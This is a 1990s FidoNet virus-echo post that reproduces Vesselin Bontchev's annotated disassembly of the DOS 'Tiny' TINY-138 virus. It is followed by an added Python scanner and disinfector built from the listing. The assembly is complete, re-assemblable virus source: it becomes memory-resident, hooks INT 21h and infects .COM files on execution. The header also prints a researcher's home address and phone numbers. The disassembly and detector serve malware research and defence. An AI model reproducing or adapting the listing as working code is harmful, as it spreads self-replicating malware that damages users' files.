;─ PVT.VIRII (2:465/65.4) ──────────────────────────────────────── PVT.VIRII ─
; Msg  : 16 of 54
; From : MeteO                            2:5030/136      Tue 09 Nov 93 09:12
; To   : - *.* -                                          Fri 11 Nov 94 08:10
; Subj : TINY_138.ASM
;──────────────────────────────────────────────────────────────────────────────
;.RealName: Max Ivanov
;══════════════════════════════════════════════════════════════════════════════
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Information on viruses)
;* From : Graham Allen, 2:283/718 (06 Nov 94 16:34)
;* To   : Fred Lee
;* Subj : TINY_138.ASM
;══════════════════════════════════════════════════════════════════════════════
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org

                page    ,132
                name    TINY138
                title   The 'Tiny' virus, version TINY-138
                .radix  16

; ╔═════════════════════════════════════════════════════════════════════════╗
; · Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ·
; · Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255        ·
; ·                                                                          ·
; · The 'Tiny' Virus, version TINY-138                                       ·
; · Disassembled by Vesselin Bontchev, September 1990                        ·
; ·                                                                          ·
; · Copyright (c) Vesselin Bontchev 1989, 1990                               ·
; ·                                                                          ·
; · This listing is only to be made available to virus researchers           ·
; · or software writers on a need-to-know basis.                             ·
; ╚═════════════════════════════════════════════════════════════════════════╝

; The disassembly has been tested by re-assembly using MASM 5.0.
code            segment
                assume  cs:code, ds:code
                org     100

seg_60          equ     600                     ; Linear address of the resident copy (0060:0000h)
v_len           equ     v_end-first4            ; Length of the virus body (138 bytes)

start:          jmp     v_entry                 ; Jump to virus code
                db      'M'                     ; Virus signature
                mov     ax,4C00                 ; Program terminate
                int     21

; The original first 4 bytes of the infected file:

first4          db      0EBh, 2, 90, 90

v_entry:        mov     si,0FF                  ; Initialize some registers
                mov     di,offset start         ; Put the address of program start in DI
                mov     bx,int_21-first4+seg_60 ; Point BX at the new INT 21h handler, as an
                                                ; offset from segment 0 (linear 600h + int_21-first4)

; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h).
; CX = 50h doubles as the segment value and as the word count for the copy:

                mov     cx,50
                add     si,[si+2]               ; Determine the start address of the virus body
                                                ; ([101h] = JMP operand = original size + 1)
                push    di                      ; Now a Near RET instruction will run the program
                movsw                           ; Restore the original first 4 bytes
                movsw
                mov     es,cx                   ; Point ES:DI at 0050:0104h (= 0060:0004h, the
                                                ; first byte of a resident copy's v_entry)
                cmpsb                           ; Check if the virus is present in memory
                jz      run                     ; Just run the program if so

; Virus not in memory. Install it there:

                dec     si                      ; Correct SI & DI to point at the start of
                dec     di                      ; virus code and to destination address
                rep     movsw                   ; Move the virus there (50h words = 160 bytes,
                                                ; enough for the 134 bytes after first4)
                mov     es,cx                   ; ES := 0 (the interrupt vector table)

; Move the INT 21h handler to INT 69h and
; install int_21 as the new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):

                xchg    ax,bx                   ; Transfer INT 21h vector to INT 69h,
                xchg    ax,cx                   ; preserving AX
lp:             xchg    ax,cx                   ; Get a word
                xchg    ax,es:[di-(69-21)*4]    ; Swap the two words ([84h] = INT 21h vector)
                stosw                           ; Save the word
                jcxz    lp                      ; Loop until done (two times)
                xchg    ax,bx                   ; Restore AX (to keep programs such as DISKCOPY happy)

run:            push    ds                      ; Restore ES
                pop     es
                ret                             ; And exit (go to CS:100h)

int_21:                                         ; New INT 21h handler (runs with CS = 0)
                cmp     ax,4B00                 ; EXEC function call?
                jne     end_21                  ; Exit if not
                push    ax                      ; Save registers used
                push    bx                      ; (CX, SI and DI are clobbered below and
                push    dx                      ;  are not saved)
                push    ds
                push    es
                mov     ax,3D02                 ; Open the file for both reading and writing
                call    do_int21                ; (DS:DX still holds the caller's file name)
                jc      end_exec                ; Exit on error
                cbw                             ; Zero AH (AL is 60h after do_int21, so AX = 60h)
                cwd                             ; Zero DX
                mov     bx,si                   ; Save handle in BX
                mov     ds,ax                   ; Set DS and ES to 60h,
                mov     es,ax                   ; the virus data segment
                mov     ah,3F                   ; Read the first 4 bytes into 0060:0000h
                int     69

; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
; Note that any file with an `M' anywhere in its first 4 bytes is skipped.

                mov     al,'M'                  ; Look for `M'
                repne   scasb                   ; (CX = 4 from do_int21, ES:DI = 0060:0000h)
                jz      close                   ; Exit if file not suitable for infection
                mov     al,2                    ; Seek to the end of file
                call    lseek                   ; SI now contains the file size (low word only)
                mov     cl,v_len                ; Length of virus body
                int     69                      ; Append the virus to the file (AH is now 40h).
                                                ; The write starts at 0060:0000h, so the 4 bytes
                                                ; just read become the new copy's first4
                mov     al,0E9                  ; Near JMP opcode
                stosb                           ; Form the first instruction of the file
                inc     si                      ; Add 1 to file size for the JMP
                xchg    ax,si                   ; Move it in AX
                stosw                           ; Form the JMP's operand (original size + 1)
                mov     al,'M'                  ; Add a `M' character to mark the file
                stosb                           ; as infected
                xchg    ax,dx                   ; Zero AX
                call    lseek                   ; Seek to the beginning
                int     69                      ; AH is 40h, write the JMP instruction

close:          mov     ah,3E                   ; Close the file
                int     69

end_exec:       pop     es                      ; Restore used registers
                pop     ds
                pop     dx
                pop     bx
                pop     ax

; Exit through the original INT 21h handler
; (CS is 0 here, so this reads the INT 69h vector):

end_21:         jmp     dword ptr cs:[69*4]

lseek:          mov     ah,42                   ; Seek operation
                cwd                             ; Zero DX
do_int21:       xor     cx,cx                   ; External entry for Open
                int     69
                mov     cl,4                    ; 4 bytes will be read/written
                xchg    ax,si                   ; Store AX in SI
                mov     ax,4060                 ; Prepare AH for Write (and AL = 60h)
                xor     di,di                   ; Zero DI
                ret                             ; Done

v_end           equ     $                       ; End of virus body

code            ends
                end     start

;-+- FMail 0.96â
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; ■ The MeteO
;
;/A=NNNN Set NewExe segment alignment factor
;
;--- Aidstest Null: /Kill
; * Origin: ·PVT.ViRII·main·board· / Virus Research labs. (2:5030/136)
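The listing fixes the on-disk layout of an infected .COM file completely: byte 0 is E9h, bytes 1-2 are a JMP operand equal to the original size plus one, byte 3 is 'M', and the 138-byte body appended at the old end of file begins with the file's original first four bytes. That is enough to write a structural scanner and disinfector without any code signature. The following Python is an added example, not part of the original message or of Bontchev's listing; the constants (138-byte body, E9/'M' header, operand = original size + 1) are read off the listing above, and the infected sample it checks is constructed in the code with the 134 bytes of virus code replaced by a zero-filled stand-in.

```python
"""Structural detection and disinfection of TINY-138 infected .COM files.

Layout taken from the disassembly:
  infected = E9 <rel16> 'M' + original[4:] + original[:4] + <134 bytes of code>
  rel16    = original_size + 1   (JMP at CS:100h lands on v_entry at 100h+size+4)
"""
import struct

V_LEN = 138            # v_end - first4 in the listing
MARKER = ord("M")      # infection marker written to byte 3

# Constructed sample: a tiny .COM program (mov ah,9 / mov dx,10Ch / int 21h /
# ret / "Hello$").  Its first four bytes contain no 'M', so it is infectable.
ORIGINAL_SAMPLE = b"\xB4\x09\xBA\x0C\x01\xCD\x21\xC3Hello$"


def is_immune(data: bytes) -> bool:
    """The resident handler does `repne scasb` for 'M' over the first 4 bytes
    and skips the file if it finds one; this covers already infected files
    and MZ/ZM .EXE headers, but also any .COM that happens to start that way."""
    return MARKER in data[:4]


def is_tiny138_infected(data: bytes) -> bool:
    """Header shape plus arithmetic consistency between JMP operand and size."""
    if len(data) < 4 + V_LEN:
        return False
    if data[0] != 0xE9 or data[3] != MARKER:
        return False
    rel16 = struct.unpack_from("<H", data, 1)[0]
    orig_size = len(data) - V_LEN
    return rel16 == orig_size + 1


def disinfect(data: bytes) -> bytes:
    """Restore the original image: the saved header sits at the start of the
    appended body (first4 in the listing), and the body itself is cut off."""
    if not is_tiny138_infected(data):
        raise ValueError("not a TINY-138 infected image")
    orig_size = len(data) - V_LEN
    first4 = data[orig_size:orig_size + 4]
    return first4 + data[4:orig_size]


def make_infected_sample(original: bytes) -> bytes:
    """Test fixture only: reproduces the file layout the listing produces.
    The virus code is replaced by zero bytes (hypothetical stand-in)."""
    if len(original) < 4 or is_immune(original):
        raise ValueError("listing would not infect this file")
    header = b"\xE9" + struct.pack("<H", len(original) + 1) + b"M"
    body = original[:4] + bytes(V_LEN - 4)
    return header + original[4:] + body


if __name__ == "__main__":
    infected = make_infected_sample(ORIGINAL_SAMPLE)
    print("original infected?", is_tiny138_infected(ORIGINAL_SAMPLE))
    print("sample   infected?", is_tiny138_infected(infected))
    print("disinfected == original?", disinfect(infected) == ORIGINAL_SAMPLE)
    # A clean program that starts with a JMP and has 'M' in byte 3 is not
    # flagged, because its operand does not match size - 137.
    decoy = b"\xE9\x10\x00M" + bytes(200)
    print("decoy    infected?", is_tiny138_infected(decoy), "immune?", is_immune(decoy))
```

The size arithmetic matters: a scanner that only looks for `E9 ?? ?? 4D` would flag any .COM whose fourth byte happens to be 'M', while the operand check ties the header to the appended 138 bytes. The `is_immune` check mirrors the virus's own test and explains the classic inoculation trick for this family: a .COM whose first four bytes include an 'M' is never infected by TINY-138, at the price of being indistinguishable from an .EXE to the virus.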